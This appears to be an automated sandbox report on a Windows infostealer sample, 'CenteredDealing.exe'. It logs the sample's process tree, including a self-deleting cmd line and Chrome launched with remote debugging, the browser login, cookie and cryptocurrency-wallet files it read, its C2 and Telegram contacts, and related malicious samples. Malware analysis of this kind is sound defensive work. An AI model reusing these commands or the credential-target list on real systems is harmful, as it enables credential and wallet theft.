    Source: C:\Windows\SysWOW64\cmd.exe; Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com; Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com" & rd /s /q "C:\ProgramData\8ycbs" & exit
    Source: C:\Windows\SysWOW64\cmd.exe; Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
    Source: Rip.com, 0000000C.00000000.1708036817.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp, Bridal.8.dr, Rip.com.1.dr; Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com; Queries volume information: C:\ VolumeInformation
    Source: C:\Users\user\Desktop\CenteredDealing.exe; Code function: 0_2_00406805 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00406805

    Stealing of Sensitive Information

    Source: Yara match; File source: sslproxydump.pcap, type: PCAP
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com; File opened:
        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
        C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files\key4.db
        C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\tmp\key4.db
        C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2918063365piupsah.files\key4.db
        C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\key4.db
        C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\db\key4.db
        C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\events\key4.db
        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
        C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\minidumps\key4.db
        C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\saved-telemetry-pings\key4.db
        C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files\key4.db
        C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files\key4.db
        C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
        C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\key4.db
        C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\pending_pings\key4.db
        C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\key4.db
        C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\key4.db
        C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes\key4.db
        C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
        C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\key4.db
        C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\bookmarkbackups\key4.db
        C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
        C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files\key4.db
        C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\temporary\key4.db
        C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\security_state\key4.db
        C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\2023-10\key4.db
        C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\to-be-removed\key4.db
        C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\key4.db
        C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\key4.db
        C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files\key4.db
        C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\key4.db
        C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes\events\key4.db
        C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\key4.db
        C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
        C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\sessionstore-backups\key4.db
        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
        C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\default\key4.db
        C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
        C:\Users\user\AppData\Roaming\Bitcoin\wallets\
        C:\Users\user\AppData\Roaming\Electrum\wallets\
        C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
        C:\Users\user\AppData\Roaming\Exodus\
        C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
        C:\Users\user\AppData\Roaming\Exodus\backups\
        C:\Users\user\AppData\Roaming\ElectronCash\wallets\
        C:\Users\user\AppData\Roaming\MultiDoge\
        C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
        C:\Users\user\AppData\Roaming\Binance\
        C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
        C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
        C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
        C:\Users\user\AppData\Roaming\Ledger Live\
        C:\Users\user\AppData\Roaming\atomic_qt\config\
        C:\Users\user\AppData\Roaming\atomic_qt\exports\
        C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
        C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\

    Remote Access Functionality

    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com; Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
    Source: Yara match; File source: sslproxydump.pcap, type: PCAP
    Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
    Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Windows Management Instrumentation | 1 DLL Side-Loading | 12 Process Injection | 111 Masquerading | 2 OS Credential Dumping | 1 Virtualization/Sandbox Evasion | Remote Services | 11 Input Capture | 11 Encrypted Channel | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
    Credentials | Domains | Default Accounts | 1 Native API | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 1 Virtualization/Sandbox Evasion | 11 Input Capture | 3 Process Discovery | Remote Desktop Protocol | 1 Archive Collected Data | 1 Remote Access Software | Exfiltration Over Bluetooth | Network Denial of Service
    Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 Extra Window Memory Injection | 12 Process Injection | Security Account Manager | 3 File and Directory Discovery | SMB/Windows Admin Shares | 3 Data from Local System | 1 Ingress Tool Transfer | Automated Exfiltration | Data Encrypted for Impact
    Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Deobfuscate/Decode Files or Information | NTDS | 15 System Information Discovery | Distributed Component Object Model | 1 Clipboard Data | 3 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
    Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Obfuscated Files or Information | LSA Secrets | Internet Connection Discovery | SSH | Keylogging | 4 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
    Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | Wi-Fi Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
    DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Extra Window Memory Injection | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
    [Behavior graph (image not preserved). Behavior Graph ID: 1582918; Sample: CenteredDealing.exe; Startdate: 31/12/2024; Architecture: WINDOWS; Score: 92. Nodes recoverable from the graph text: CenteredDealing.exe started cmd.exe; cmd.exe dropped C:\Users\user\AppData\Local\...\Rip.com (PE32) and started Rip.com, two further cmd.exe processes and 9 other processes; Rip.com contacted h7h7h7.online (116.203.13.109, HETZNER-ASDE, Germany) and t.me (149.154.167.99, TELEGRAMRU, United Kingdom) and started chrome.exe and cmd.exe.]

    Source | Detection | Scanner | Label | Link
    CenteredDealing.exe | 8% | ReversingLabs | |

    Source | Detection | Scanner | Label | Link
    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com | 0% | ReversingLabs | |

    No Antivirus matches

    Name | IP | Active | Malicious | Antivirus Detection | Reputation
    plus.l.google.com | 216.58.212.174 | true | false | | high
    play.google.com | 142.250.186.174 | true | false | | high
    t.me | 149.154.167.99 | true | false | | high
    h7h7h7.online | 116.203.13.109 | true | true | | unknown
    www.google.com | 172.217.16.132 | true | false | | high
    uVsReHLpkvXMkPFzJmRm.uVsReHLpkvXMkPFzJmRm | unknown | unknown | false | | unknown
    apis.google.com | unknown | unknown | false | | high
    Name | Malicious | Antivirus Detection | Reputation
    https://t.me/w211et | false | | high
    https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw | false | | high
    Name | Source | Malicious | Antivirus Detection | Reputation
                                                                                                                                                                    high
                                                                                                                                                                    http://anglebug.com/7406chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://www.google.com/searchchrome.exe, 00000011.00000003.2024388713.0000211001498000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://anglebug.com/7161chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://drive-autopush.corp.google.com/chrome.exe, 00000011.00000003.1982128120.0000211000498000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://www.google.com/search?q=$chrome.exe, 00000011.00000003.2005088848.000021100042C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://anglebug.com/7162chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                http://anglebug.com/5906chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  http://anglebug.com/2517chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    http://anglebug.com/4937chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://issuetracker.google.com/166809097chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        http://issuetracker.google.com/200067929chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          https://lens.google.com/v3/2chrome.exe, 00000011.00000003.2025823811.00006C780080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1977099612.00006C7800390000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            https://anglebug.com/7847chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              https://google-ohttp-relay-join.fastly-edge.com/chrome.exe, 00000011.00000003.1977551360.00006C7800684000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                https://lens.google.com/v3/uploadchrome.exe, 00000011.00000003.1977944173.00006C78006E4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  http://anglebug.com/3832chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg9z5fu3.12.drfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      https://drive-daily-6.corp.google.com/chrome.exe, 00000011.00000003.1982128120.0000211000498000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        https://www.google.comAccess-Control-Allow-Credentials:chrome.exe, 00000011.00000003.2008108429.0000211000294000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          high
                                                                                                                                                                                                          https://drive-daily-0.corp.google.com/chrome.exe, 00000011.00000003.1982128120.0000211000498000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            high
                                                                                                                                                                                                            https://drive-thirdparty.googleusercontent.com/32/type/chrome.exe, 00000011.00000003.2005088848.000021100042C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              high
                                                                                                                                                                                                              https://lens.google.com/uploadchrome.exe, 00000011.00000003.2005345645.000021100120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2005576177.0000211000B3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2005088848.000021100042C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                high
                                                                                                                                                                                                                https://drive-daily-3.corp.google.com/chrome.exe, 00000011.00000003.1982128120.0000211000498000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  high
                                                                                                                                                                                                                  http://anglebug.com/6651chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    high
                                                                                                                                                                                                                    https://goto.google.com/sme-bugs2echrome.exe, 00000011.00000003.2024388713.0000211001498000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      high
                                                                                                                                                                                                                      https://anglebug.com/6574chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        high
                                                                                                                                                                                                                        http://www.broofa.comchromecache_98.19.drfalse
                                                                                                                                                                                                                          high
| IP | Domain | Country | ASN | ASN Name | Malicious |
| --- | --- | --- | --- | --- | --- |
| 142.250.186.174 | play.google.com | United States | 15169 | GOOGLEUS | false |
| 149.154.167.99 | t.me | United Kingdom | 62041 | TELEGRAMRU | false |
| 239.255.255.250 | unknown | Reserved | unknown | unknown | false |
| 216.58.212.174 | plus.l.google.com | United States | 15169 | GOOGLEUS | false |
| 116.203.13.109 | h7h7h7.online | Germany | 24940 | HETZNER-ASDE | true |
| 172.217.16.132 | www.google.com | United States | 15169 | GOOGLEUS | false |
                                                                                                                                                                                                                          IP
                                                                                                                                                                                                                          192.168.2.4
                                                                                                                                                                                                                          127.0.0.1
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1582918
Start date and time: 2024-12-31 21:38:52 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 3s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name: Run with higher sleep bypass
Number of analysed new started processes analysed: 24
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: CenteredDealing.exe
Detection: MAL
Classification: mal92.troj.spyw.evad.winEXE@47/48@9/8
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 36
• Number of non-executed functions: 36
Cookbook Comments:
• Found application associated with file extension: .exe
• Sleeps bigger than 100000000ms are automatically reduced to 1000ms
• Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                                                                                                          • Excluded IPs from analysis (whitelisted): 199.232.210.172, 192.229.221.95, 142.250.186.78, 142.250.185.67, 74.125.71.84, 142.250.184.238, 142.250.181.238, 142.250.186.163, 142.250.186.142, 142.250.185.170, 142.250.185.202, 142.250.186.74, 142.250.185.106, 142.250.186.138, 172.217.16.202, 216.58.212.170, 216.58.206.42, 142.250.185.74, 142.250.186.106, 142.250.184.234, 172.217.18.10, 216.58.206.74, 142.250.186.42, 142.250.185.138, 142.250.184.202, 2.22.50.144, 4.245.163.56, 184.28.90.27, 13.107.246.45
                                                                                                                                                                                                                          • Excluded domains from analysis (whitelisted): fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, clientservices.googleapis.com, ogads-pa.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, redirector.gvt1.com, clients.l.google.com, www.gstatic.com
• Not all processes were analyzed; report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: CenteredDealing.exe
No simulations
                                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                          239.255.255.250https://readermodeext.info/ai-connectGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            https://ocemt-my.sharepoint.com/:o:/g/personal/cgremel_ocemt_edu/El0lVz9DgmtMsBazSuh3bdYBcfj71dOqNLuq6XsKZMLXlA?e=5%3axcx4cZ&at=9Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              FW_ Carr & Jeanne Biggerstaff has sent you an ecard.msgGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                TieLoader.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                  https://password-changes.phishwall.net/XMzUzaXgwTnBGZU9XbU9kQnFIZk0vQ3hhQlNtUXJwaExCOTNDYnhpMG92ZHRNQjI5SHhmNUlLTC9JcmVVS2sraDgvUVZtd2YwVFROeGxlbDR0UXBkeGJOUkN3UGliUUNGVHZXWVJ2ek5hZ0FNV290djROWFRxN3JNazM1WlhNOUVLdnlqOEVlbXFaaFROMlltRDFFKzhmU3A0eEl4cE1tMFJmazVYOE5hc25oTjNIR0Q1UzJyNW5wTkNBPT0tLUdCVnp5RnltanNuQnVQWkgtLVA0Uy9TcENHeDltOGdwd282cnZiaEE9PQ==?cid=2317630324Get hashmaliciousHTMLPhisher, KnowBe4Browse
                                                                                                                                                                                                                                    http://4.lkx91.michaelhuegel.com/news?q=IP%20provider%20is%20blacklisted!%20MICROSOFT-CORP-MSN-AS-BLOCKGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                      over.ps1Get hashmaliciousVidarBrowse
                                                                                                                                                                                                                                        MatAugust.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                          http://trezorbridge.org/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            149.154.167.99http://xn--r1a.website/s/ogorodruGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • telegram.org/img/favicon.ico
                                                                                                                                                                                                                                            http://cryptorabotakzz.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • telegram.org/
                                                                                                                                                                                                                                            http://cache.netflix.com.id1.wuush.us.kg/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • telegram.org/dl?tme=fe3233c08ff79d4814_5062105595184761217
                                                                                                                                                                                                                                            http://investors.spotify.com.sg2.wuush.us.kg/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • telegram.org/
                                                                                                                                                                                                                                            http://bekaaviator.kz/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • telegram.org/
                                                                                                                                                                                                                                            http://telegramtw1.org/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • telegram.org/?setln=pl
                                                                                                                                                                                                                                            http://makkko.kz/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • telegram.org/
                                                                                                                                                                                                                                            http://telegram.dogGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • telegram.dog/
                                                                                                                                                                                                                                            LnSNtO8JIa.exeGet hashmaliciousCinoshi StealerBrowse
                                                                                                                                                                                                                                            • t.me/cinoshibot
                                                                                                                                                                                                                                            jtfCFDmLdX.exeGet hashmaliciousGurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRATBrowse
                                                                                                                                                                                                                                            • t.me/cinoshibot
                                                                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                            t.meover.ps1Get hashmaliciousVidarBrowse
                                                                                                                                                                                                                                            • 149.154.167.99
                                                                                                                                                                                                                                            MatAugust.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                            • 149.154.167.99
                                                                                                                                                                                                                                            6684V5n83w.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                            • 149.154.167.99
                                                                                                                                                                                                                                            BHgwhz3lGN.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                            • 149.154.167.99
                                                                                                                                                                                                                                            Tool_Unlock_v1.2.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                            • 149.154.167.99
                                                                                                                                                                                                                                            JA7cOAGHym.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                            • 149.154.167.99
                                                                                                                                                                                                                                            https://linkenbio.net/59125/247Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 149.154.167.99
                                                                                                                                                                                                                                            aD7D9fkpII.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                            • 149.154.167.99
                                                                                                                                                                                                                                            installer.batGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                            • 149.154.167.99
                                                                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                            TELEGRAMRUEtqq32Yuw4.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                                                                            • 149.154.167.220
                                                                                                                                                                                                                                            over.ps1Get hashmaliciousVidarBrowse
                                                                                                                                                                                                                                            • 149.154.167.99
                                                                                                                                                                                                                                            MatAugust.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                            • 149.154.167.99
                                                                                                                                                                                                                                            vEtDFkAZjO.exeGet hashmaliciousRL STEALER, StormKittyBrowse
                                                                                                                                                                                                                                            • 149.154.167.220
                                                                                                                                                                                                                                            Invoice-BL. Payment TT $ 28,945.99.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                                                                                                                                                                                            • 149.154.167.220
                                                                                                                                                                                                                                            6684V5n83w.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                            • 149.154.167.99
                                                                                                                                                                                                                                            file.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                                            • 149.154.167.220
                                                                                                                                                                                                                                            XClient.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                            • 149.154.167.220
                                                                                                                                                                                                                                            BHgwhz3lGN.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                            • 149.154.167.99
                                                                                                                                                                                                                                            HETZNER-ASDEover.ps1Get hashmaliciousVidarBrowse
                                                                                                                                                                                                                                            • 116.203.14.4
                                                                                                                                                                                                                                            MatAugust.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                            • 116.203.14.4
                                                                                                                                                                                                                                            6684V5n83w.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                            • 116.203.14.4
                                                                                                                                                                                                                                            RtU8kXPnKr.exeGet hashmaliciousQuasarBrowse
                                                                                                                                                                                                                                            • 88.198.193.213
                                                                                                                                                                                                                                            BHgwhz3lGN.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                            • 116.203.14.4
                                                                                                                                                                                                                                            botx.ppc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                            • 49.13.202.247
                                                                                                                                                                                                                                            Tool_Unlock_v1.2.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                            • 116.203.14.4
                                                                                                                                                                                                                                            db0fa4b8db0333367e9bda3ab68b8042.i686.elfGet hashmaliciousMirai, GafgytBrowse
                                                                                                                                                                                                                                            • 5.9.64.57
                                                                                                                                                                                                                                            Electrum-bch-4.4.2-x86_64.AppImage.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 136.243.250.139
Match: 37f463bf4616ecd445d4a1937da06e19
Associated Sample Name / URL | Detection | Threat Name | Context
LinxOptimizer.exe | malicious | Unknown | 116.203.13.109, 149.154.167.99
setup.msi | malicious | Unknown | 116.203.13.109, 149.154.167.99
over.ps1 | malicious | Vidar | 116.203.13.109, 149.154.167.99
MatAugust.exe | malicious | Vidar | 116.203.13.109, 149.154.167.99
